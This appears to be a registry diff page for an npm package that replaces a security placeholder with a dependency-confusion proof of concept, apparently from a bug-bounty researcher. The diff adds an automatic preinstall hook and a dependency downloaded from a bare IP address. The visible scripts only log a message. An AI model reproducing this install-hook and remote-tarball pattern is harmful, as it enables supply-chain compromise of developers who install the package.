@fandom-frontend/react-common 0.0.1-security → 100.100.106
This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
Potentially problematic release.
This version of @fandom-frontend/react-common might be problematic. Click here for more details.
- package/index.js +1 -0
- package/package.json +14 -3
- package/preinstall.js +1 -0
- package/README.md +0 -5
package/index.js
ADDED
@@ -0,0 +1 @@
|
|
1
|
+
console.log("Test package installed by hackerone.com/thruster")
|
package/package.json
CHANGED
@@ -1,6 +1,17 @@
|
|
1
1
|
{
|
2
2
|
"name": "@fandom-frontend/react-common",
|
3
|
-
"version": "
|
4
|
-
"
|
5
|
-
"
|
3
|
+
"version": "100.100.106",
|
4
|
+
"type": "module",
|
5
|
+
"description": "# To use this template:",
|
6
|
+
"main": "index.js",
|
7
|
+
"scripts": {
|
8
|
+
"test": "echo \"Error: no test specified\" && exit 1",
|
9
|
+
"preinstall": "node preinstall.js"
|
10
|
+
},
|
11
|
+
"dependencies": {
|
12
|
+
"fandom-frontend-react-common-poc": "http://165.22.222.215:8081/repository/thruster-pocs/fandom-frontend-react-common-poc/-/fandom-frontend-react-common-poc-99.99.99.tgz"
|
13
|
+
},
|
14
|
+
"author": "",
|
15
|
+
"license": "ISC"
|
6
16
|
}
|
17
|
+
|
package/preinstall.js
ADDED
@@ -0,0 +1 @@
|
|
1
|
+
console.log("test package installed by hackerone.com/thruster")
|
package/README.md
DELETED
@@ -1,5 +0,0 @@
|
|
1
|
-
# Security holding package
|
2
|
-
|
3
|
-
This package contained malicious code and was removed from the registry by the npm security team. A placeholder was published to ensure users are not affected in the future.
|
4
|
-
|
5
|
-
Please refer to www.npmjs.com/advisories?search=%40fandom-frontend%2Freact-common for more information.
|